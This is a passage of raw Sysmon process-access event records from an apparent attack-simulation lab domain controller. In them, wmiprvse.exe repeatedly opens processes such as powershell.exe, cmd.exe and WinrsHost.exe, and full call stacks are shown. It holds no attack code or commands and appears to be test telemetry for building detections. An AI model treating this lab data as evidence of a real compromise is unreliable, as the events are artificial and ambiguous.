\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005460Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005459Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005458Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005457Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005456Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005455Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005454Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005453Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005452Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005451Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005450Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005449Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005448Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005447Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005446Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005445Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005444Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005443Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005442Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005441Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005440Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005439Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005438Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005437Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005436Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program 